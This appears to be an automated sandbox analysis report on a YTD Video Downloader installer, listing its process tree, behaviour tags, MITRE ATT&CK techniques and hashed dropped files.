    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
    3⤵
    PID:5172
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
    3⤵
    PID:5388
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5852 /prefetch:8
    3⤵
    PID:5444
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5932 /prefetch:8
    3⤵
    PID:5600
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
    3⤵
    PID:5820
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
    3⤵
    PID:5828
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5644 /prefetch:8
    3⤵
    PID:5860
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5644 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5200
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
    3⤵
    PID:5468
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
    3⤵
    PID:5480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2252,7184943078925102664,11806806764510083832,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4256 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4324

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:644
- C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe
  "C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2356
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ytddownloader.com/premium.html?lngid=1033&lt=b&isn=FEB0AD16677D4675A14C6512C8A782E3&av=5.9.18&ft=4&kt=ytdd
    3⤵
    PID:4784
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcbad846f8,0x7ffcbad84708,0x7ffcbad84718
      4⤵
      PID:1256

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1896

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlc.dll

Filesize
111KB

MD5
ded3aa6b7920334e6b334eaed3db96c5

SHA1
43ddc57d22dce102a3687e548bd36e32fe20495e

SHA256
feed76629d5f9dbe7401a326994e80b003ca5fe1cf876029e4707a71bf4b5860

SHA512
aeec44f69d430a544594433a8e830af075cad27a7dfe83401ee82e51a949d1140e253ee49f786b944ddf98f513f3754eda6bf0311288eddf7ad1a73d8110de9c

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlccore.dll

Filesize
2.2MB

MD5
3c07164ceba1068ee3eff672d8e11eb6

SHA1
c96d644ad20a788100609061c052220828784a09

SHA256
170a18f9d841606432b9157f243c43c7a2d53bf1fc028a147bd15f505749e69a

SHA512
af48e1d10f442789df7edaa89b7364f7670134af7f8c624b22073eadaf3516cf10aab196b411835afb839c0256314eb3d75fec37afe3f78f5e5fe123b3ffef4f

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\access\libfilesystem_plugin.dll

Filesize
45KB

MD5
ab0a22194181d6d6ff01123dc9a376ce

SHA1
006355a4240c874443db242ec4d79b8f61e149be

SHA256
4d03b0edd616098fa390a41f8d68f6b77f4c96abf0bbf1578e310c1846017da1

SHA512
1db197bf8e99cd3e729a481a6f24fe1b090a12679a6ab5b6334e26a8442bd80d25379104c475fc9a70111b8c57ca048c4a3f40eb6e667814cce9ab1c86b6253e

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libaudio_format_plugin.dll

Filesize
45KB

MD5
91074f5c7288c67eaed2c2c657e373d3

SHA1
84aecb92336c668bd834a749081eaf1e476c38e4

SHA256
085dc559b88b1687b2918b8ee797734adfbbaa233ba7d8f0e8b5abea8740ca51

SHA512
579a27e5f3565efe46a47034f2880782c5a947b56e65118e8cbc58c886ec805ce39593becce5df4aeb851adc12fc22fd3db450c67b864a618dea05822c58a4a4

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll

Filesize
36KB

MD5
43f19a5d4d42e3cd6514348ba5fbdd96

SHA1
1f708f75fb1024be8b3f6e51ac465664f9414e29

SHA256
634e0e8bcecde4375f1f9510980bc2bf95495acfc8d0a14d15307c49829b4b2a

SHA512
bee50cdaeb50c888bd7df7ed789983a47ce6a50ab8bbba006519640530de8744f164628e741be8cd106cc229de1ca5f63ce23f41e94343869e8ba1aadd840f41

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libugly_resampler_plugin.dll

Filesize
35KB

MD5
a3297b187aba1024501007bce77eeec4

SHA1
66b0d789f0fc6e465827bc372047ae1b57fb209c

SHA256
bf000179818fd3db857f7f46dca974698258fc11acf518fd77df4f5a9de05bbd

SHA512
8528aedc44bfb827fa2b5c9fe7c36152daa2e7c4cec32b8eabd8167dca4deadbe3dbd2b4723f00355a1f77cca1ff8c3275cc33c85454ef3e951a72bd1a6a407f

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libfloat_mixer_plugin.dll

Filesize
34KB

MD5
04a21f5ee0a9c27ca5e5dae050f3d275

SHA1
44835c934ec2a4e37a75023317798837e412e34f

SHA256
ef0fdefcf8af37c1ebaca95e79279907a389915d09e81da38fea9ff17afb1acc

SHA512
6fb0b523288c70f11cd1fae8bed774266956033352df6e9dea3f3881a9b971f0d13eddf9d6d124edccc4dc7ead9441749b091017b3f9ed2b33f887a1f8f660fa

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libinteger_mixer_plugin.dll

Filesize
36KB

MD5
d4f826e68b616cccc1de1e5ef07738b8

SHA1
e35d6657f4de4826d790c935f94ce41320d09b00

SHA256
1b64f39162f9918597019a89068edb9607caae194fd80b5367df08ed06ed5a78

SHA512
877df9980a3951d9f65983ddfac5df8026229e99618cd05b6c803e754074d760c5f4308cd54a1c7e7ba8f65ef684ea43eaa06ebebd4e1a38441ea9a63b47c956

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_output\libdirectsound_plugin.dll

Filesize
46KB

MD5
46672363f47a25d69a5324045f4e8d63

SHA1
f0d65ad9301f953f7b604087d27ce3e600891250

SHA256
0a2f80092b426f11dbf54b10542d3d7b45d2e40fc575e8e0e73cdcca47b4885d

SHA512
24b52206390b04cb909a1da12b46294f2aa848a42c27a6d765e6666ffbf86f64bac929e9210723d5c537a11d015d2f556e39821d01310a328cf41c988a25146b

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\codec\libavcodec_plugin.dll

Filesize
9.5MB

MD5
4088b4e4ea76db97544c76ef7f2af08c

SHA1
c862b32ed75b8ad1c029edd2c0f492fcb689f8e6

SHA256
2d7aff56a160ac39f7b68b34eb1e25bbeee8fca6034fee8f278abd0fb3dbc0d8

SHA512
66f664a8fc270bc611cc1c247fbe9a2b26baa900b7b38a35ac2d232b6af694914667eb066139e1a889b33e226b845f74f615b48ef84eb626fcf3db137468087c

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_filter\libswscale_plugin.dll

Filesize
528KB

MD5
416108272cc56d4036d5796fbb1b8f3c

SHA1
66a7bb238eb0d4ba6543a0046df5324a8833cceb

SHA256
7bf969f40afb0ae30da950059a10868e1a20c0d64ed7da11fa5c9c7e0a123bc4

SHA512
682062f8d3b012242b3f679a16f1e4edf62f7918864488f49fcc8ee5b938989ec6828417c0f771ec2835e11688ce024dc84dbc859c70daac2fff87fab28019fa

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdirect3d_plugin.dll

Filesize
78KB

MD5
350983ab596397b2d2703d658baeea8c

SHA1
63205b4238ba14871bc44c7b14b61c43ea509f19

SHA256
36f5f233c3c01c8ddbe330a760d28c0733fc512ba5097daba5c992742e0a6571

SHA512
b923e096a0f0460055d8f959ea496625e87a939b0c054fb2331508d8905a3c19ef7dd9a0d327144a70a1ded62cfb602c42637fa2be1de69b1a74f61101fb962e

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdrawable_plugin.dll

Filesize
36KB

MD5
6d9fa70a05698e9b6aa1c6074def16e8

SHA1
41b2e9aa0ed69a75a279cd3b57e5b4666e9ab991

SHA256
3ef1918ccb05373eb15f5298d083c1c0a8e171ed2ab321a6c2270f26c2185a5b

SHA512
a075bdba7c71664880549b6779d56fc5e354f1ed11eb1f50be68e4e6f81c7fc4b4ead6a7478e58c460f292aac02506d01d5c65a7b42cd4a65ef554b75a20eb01

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libvmem_plugin.dll

Filesize
39KB

MD5
3dee8d41db28133b3d00bfdf0fd16eaf

SHA1
55f447676e8d94df25285155f6974583613395ed

SHA256
d6af06ae76f1409b16d2e781217b863a7b32d5ca953795f52d5aa54b0491272c

SHA512
6b222b39601210957082e490073b2d15caa0ccb94121385f4372a02f916a04d4c1824b0f897c875fa1a756d81d511f4ffa649dae7cc900c3746817e1049a67ac

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libwingdi_plugin.dll

Filesize
64KB

MD5
ccc67f588880568bfd46c4b8140f41aa

SHA1
5d37e43434dc31d55624bfd481c816bd2a285b6d

SHA256
8f42dafb5528c09248478913ba39b6381128c28eace727b488d639f36e614a7d

SHA512
5ac2ae619bb27a4c8cd2fdbed454d930cb5ed8ffa134ab6e9eb84c156650955b7eb1ab4542e5477f7aebad95194dd0dd751dfc508781d9820079d8189ef45092

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\scripts.yds

Filesize
220KB

MD5
d8ced7c2193354757988028fbdbf197e

SHA1
23e7c13471207cc7abd0267f11f9c814bece7011

SHA256
6b384b1e208a2260f54e3d003449c53c03acd8947c8762060fd9e9832dc3bd9c

SHA512
96db2348c6c8f00fb14321b3b816a1a59a60bc54f66002253d6ac43768c94aca5ec3435069e17a23426034bd583c350cdfbcb9daf4b258a8fd485bc96a34f908

Download Submit
C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe

Filesize
1.9MB

MD5
b1934b07dd28fe1ba94df3861128402b

SHA1
c5d918e696059437dacffa8c3359ee31e97e6e06

SHA256
2670c0406f42be2455f3a20e3ae8b024a41c46b956df9214cb63ca1efa18b17e

SHA512
e863702d96a1a8371403933d9a0e082498d15a39fcf0bedb981913981f8cd9dab64e54202c4a7f2b4c6e4407fd3a7bdb9b0a96340b258476cf59057e80cbbc7f

Download Submit
C:\Users\Admin\9b54547bfb7c7280152b9770256db825\98aa00cf6d8c2f1cd36953ee0a6be9fc\98fed0c17d34c7ba82f1d4f6baa20301\6c9fe5f0c1557fb15be5eff57688c5c0\728f38e1cbe4919f666a439e00383f9c\ea5d05ccc9e7d731a8c76d3fcea7c33e\ae1aa033696c45cbe7a707a682bd157d

Filesize
91KB

MD5
f7bf92d569afcd62a0c71f8cf79fd1d3

SHA1
19207112905384eeaaa28c026ebdeb6046e2c62d

SHA256
9ca737b0bb235ef21c1a3eded061c7182f6a2055272b807a7c93d409f87c8009

SHA512
e5f99c08d5b6b031d8a858c1020ea6e994f93cf76ead84913aaaa8055aedab0514a423d37ce8d8eb3d7f7dae5fdb83bc6e4ea3e075e61803e85b362b2c00ffd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
61cef8e38cd95bf003f5fdd1dc37dae1

SHA1
11f2f79ecb349344c143eea9a0fed41891a3467f

SHA256
ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e

SHA512
6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0a9dc42e4013fc47438e96d24beb8eff

SHA1
806ab26d7eae031a58484188a7eb1adab06457fc

SHA256
58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151

SHA512
868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

Filesize
215KB

MD5
0e3d96124ecfd1e2818dfd4d5f21352a

SHA1
098b1aa4b26d3c77d24dc2ffd335d2f3a7aeb5d7

SHA256
eef545efdb498b725fbabeedd5b80cec3c60357df9bc2943cfd7c8d5ae061dcc

SHA512
c02d65d901e26d0ed28600fa739f1aa42184e00b4e9919f1e4e9623fe9d07a2e2c35b0215d4f101afc1e32fc101a200ca4244eb1d9ca846065d387144451331c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
696B

MD5
7a8b55f5a9ddf1e3d03c85dae851b7ea

SHA1
bacc40743f631a90548db030d3707fc4e3ef9235

SHA256
2eefcb4d156fe3da169bbb1af17472c8d646268351eac692614213487749a194

SHA512
dd6fc1447d07ef6f4b3337bdf2fe946775a01a12d42432dacf12eb3cf25d0bf26a8625e829a1e5eb65c3e31444f13afbc9f022e3cb977c117f76360ed4ab599b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
3f6e5f75f3207d47ad84a28127fae638

SHA1
8a52ed132b34cfd33a62378e910970153e608eb1

SHA256
4a01df8af1615264aaa735391b1852bbbbee1003f60caeb751e81c3f0f73906c

SHA512
0285f6390bc63a7fd16827f43cb96fc765a466c02e5c7bf49931d397e0479944b1c9fa5d7588172eab5946ce25de9b046b03fe0f9d2d586700af474dedb2fc95

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
de2c29fc205120153dad8656fc899422

SHA1
6fa401194502b3e05c7e07e162087d645f254046

SHA256
76dbf7bb9a26b689f78d9b7f3a9d985335781edb035d31413c4f84f9a65ee39a

SHA512
86e1e3df191c3d0109931989656e0c956bd66e58bcbd961a980bb3b2ab62188ddf2e89be40eec48fb81e79f97848e92628718d1dc9e320f76fd758c000a471d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
815ee771569f139d15dd58e34f6a41d7

SHA1
bc98ecf4089c9665d7864bc0176ba57cb8a9fd27

SHA256
fd1c0c023d29244c365e56e803e0132baaaaef234f4dd6b7429cee7252a84980

SHA512
5b0e1ab0c73c471385f792a649f62cc910e829000677980b14ff4452fa07213f4089836af3b23199100734a7bb09e3880612d1edb1cd1c5e80b1984fc985ce3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
e4bea0bb6515023f9570483d068b8713

SHA1
aa9d2cb38688abc536f9d9b171027035ba292f7c

SHA256
2d51f06842bbf177945f6b2ea4e6dc6ccb71c48f5d7b57ea43bb4e523223558a

SHA512
7b12549956ca6ba4e6fd6f7e758a34a4e18a6c1fc57b0327ad14c24f99f127aa4b56a8b32bacad530b5159ba0e89cf92ae9bf877f1e8fcad8b83c89a0b2ba518

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sskgv51p.ucj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8G1QS.tmp\00b4442af9d1fa3ed6dacb22bd133c65278f3c0aca9c331c16035f6b77c428f9.tmp

Filesize
3.2MB

MD5
f95ada73befa755b571eb48a45a9d3d2

SHA1
b9e468de9711bec40c2c7ad846fda0d28aadb78e

SHA256
b90ac9da590ba7de19414b7ba6fbece13ba0c507f1d6be2be2b647091f5779f0

SHA512
327c4b535e8b19bc1c4340e768ea025357f1e200c43ced9ebc92903cc6ae305c31fb57e0fb81ebad9e80a96fb2f6cadc97a7b8c6ff5c34bf5e07e58014b03399

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-CHBQA.tmp\YTDSetup.exe

Filesize
9.9MB

MD5
37c8ee1cae9779ec094be29a35a5061d

SHA1
ae99157bda438ad024e38dd91a975246b00dd557

SHA256
0ac4b34f2a8f9c004f6c942ce112a0ab87bb1c2b17a7dd745519eb414ebdae35

SHA512
e725a2ec6f3550e8de89b200f4bb79f808f14d6da04d4a80629ecb1b428ba0c74a0468e7b7bb53d89744bbba19066f4799e3a84951d21215ce0b72edf0798728

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-CHBQA.tmp\_isetup\_isdecmp.dll

Filesize
34KB

MD5
c6ae924ad02500284f7e4efa11fa7cfc

SHA1
2a7770b473b0a7dc9a331d017297ff5af400fed8

SHA256
31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26

SHA512
f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsrB047.tmp\NSISHelper.dll

Filesize
401KB

MD5
373c6ac98ae82cf341394215d28b5830

SHA1
2e3542372f1e520cdd47d30035dda85fdd2b11f9

SHA256
5cfd1ab1740c4a68cae314157468423dcd7b0ffe873b91257e10fa28169a7d18

SHA512
6d0a31a6c5c4b965633f943eaa15d3495be072f035d97deac27690d6a6a6890a8f817b406153fbba5a8862675b4f3015ac9e93fc8b6d90b1c4b029857123a117

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsrB047.tmp\System.dll

Filesize
12KB

MD5
0d7ad4f45dc6f5aa87f606d0331c6901

SHA1
48df0911f0484cbe2a8cdd5362140b63c41ee457

SHA256
3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

SHA512
c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsrB047.tmp\UserInfo.dll

Filesize
4KB

MD5
9eb662f3b5fbda28bffe020e0ab40519

SHA1
0bd28183a9d8dbb98afbcf100fb1f4f6c5fc6c41

SHA256
9aa388c7de8e96885adcb4325af871b470ac50edb60d4b0d876ad43f5332ffd1

SHA512
6c36f7b45efe792c21d8a87d03e63a4b641169fad6d014db1e7d15badd0e283144d746d888232d6123b551612173b2bb42bf05f16e3129b625f5ddba4134b5b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsrB047.tmp\nsDialogs.dll

Filesize
9KB

MD5
466179e1c8ee8a1ff5e4427dbb6c4a01

SHA1
eb607467009074278e4bd50c7eab400e95ae48f7

SHA256
1e40211af65923c2f4fd02ce021458a7745d28e2f383835e3015e96575632172

SHA512
7508a29c722d45297bfb090c8eb49bd1560ef7d4b35413f16a8aed62d3b1030a93d001a09de98c2b9fea9acf062dc99a7278786f4ece222e7436b261d14ca817

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsrB047.tmp\nsisdl.dll

Filesize
15KB

MD5
ba2cc9634ebed71cea697a31144af802

SHA1
8221c522b24f4808f66a476381db3e6455eab5c3

SHA256
9a3c2fe5490c34f73f1a05899ef60cfef05e0c9599cd704e524ef7a46ead67ba

SHA512
dcc74bcedd9402f7ac7e2d1872fe0e2876ae93cf8bbd869d5b9b7b56cea244ba8d2891fa2b51382092b86480337936f5ec495d9005d47fbfd9e2b71cb7f6ba8f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\jQPaecfIRokSDHv\CVKONuvHwUtWBjG.pmBxzdhUAl

Filesize
173KB

MD5
b06b9ac02b02160dd9b16d77b4046ee2

SHA1
da9e7f08698431edb8aaa7adf7b4cebb8ddbcc07

SHA256
664a1e869f6ae28a1277ad805456dc0db81921babf4097708b607c12816b4ed5

SHA512
51e71f746749332082a6d3fc76fa1eaffe5214d71ad961ce29e698a1337a2a4822e8bef93b7e5351f88d8fb9275518f5e247d80fcd96fab7d03c912bc0fd448b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\jQPaecfIRokSDHv\CYfwWrQhbcqSdR.ElMpQvDZCwdo

Filesize
93KB

MD5
36e0087f176495216527f221fdd623b7

SHA1
2f432715d9ca85c0b1d674ae39c8df78ba1441ff

SHA256
65f4e89406e6108204723e007aa5ed5debf4ac909e5072490929fe66f34d587a

SHA512
9538bac62f6177f94965309f5391cf2fac8d84290d34e4e3772e8ae54d25ac88ece6f6fd1f8db5b2e2625d2dfcfa4e481375e66714d55b516b43cda923d643e7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\jQPaecfIRokSDHv\DrHqdumaybzI.McfeEFgmtjXx

Filesize
116KB

MD5
cdc1b49e85502c3b515814a970761642

SHA1
0c048fac111281e3c4334efb1e3316ceed48b650

SHA256
1f811e881de7d5d646eae13148ab1755e697614b2aa21e736e0c3d8ce515b739

SHA512
fffd4723f0437332884c324ec79b2cb644894419d291d830533a2a64de85215ecfcf6262faa18068d5e37e541f7e84cccf92624ea121b4e82b3df0ed527c292a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\jQPaecfIRokSDHv\DvUWhscibdIefXxT.fnvaOKwUFquWcMkDetj

Filesize
65KB

MD5
da0c1e5cb0af117bb4294bfc6a5ce869

SHA1
d7d687f1aefc66a17a1e772ebb93cede4fbfd27f

SHA256
5577955824fe5ef1a3bdacf7c70eacd4bca25c372a4f35bba32fd9836d47638b

SHA512
5f93248302c101295472cabd7ccab628dfcf67b9b570d5c62067296660ba09e62876e8e4d0cf7d2088d05a5153883370e7c705a1da3c0592d78bf5cb1c32fee2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\jQPaecfIRokSDHv\ESBeUkPrzZ.qNnBWSDwZTsJex

Filesize
72KB

MD5
7766ffc4123e5d3f5b658407b635e685

SHA1
64a14495447dc12828616c508743a5ca7e7d0a97

SHA256
7068042c9061d6eb48a93a7f53b1fbfebd151794b434f37e0bb137049355c943

SHA512
80ae9ce5e9cbd82dba6d8b5b98cb05b0151e2982bd8ddd09f91c3b27602063584804e1c0a100ac13878eec94d8d058db2829e67e2caa56c963c19064f0f69f87

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\jQPaecfIRokSDHv\FUYGbpcyJTCQldeBmZ.hgGICAaJuqeMHlf

Filesize
82KB

MD5
5f0651804ea1139957dec357da44495a

SHA1
25e8e71deeba0a592aaa961432df2c05edad0a49

SHA256
7157102c443605cc4427853fd6d350f37b75f84c485b2418cb65ab779c5df049

SHA512
7eb018e122c1604cb11b5494731103922adb89c9955601c0ba5322dc7ff6181e598f8285520158f7b128743c48c333c4feb783874a4d9e54254d3faddf4394e0

Download Submit
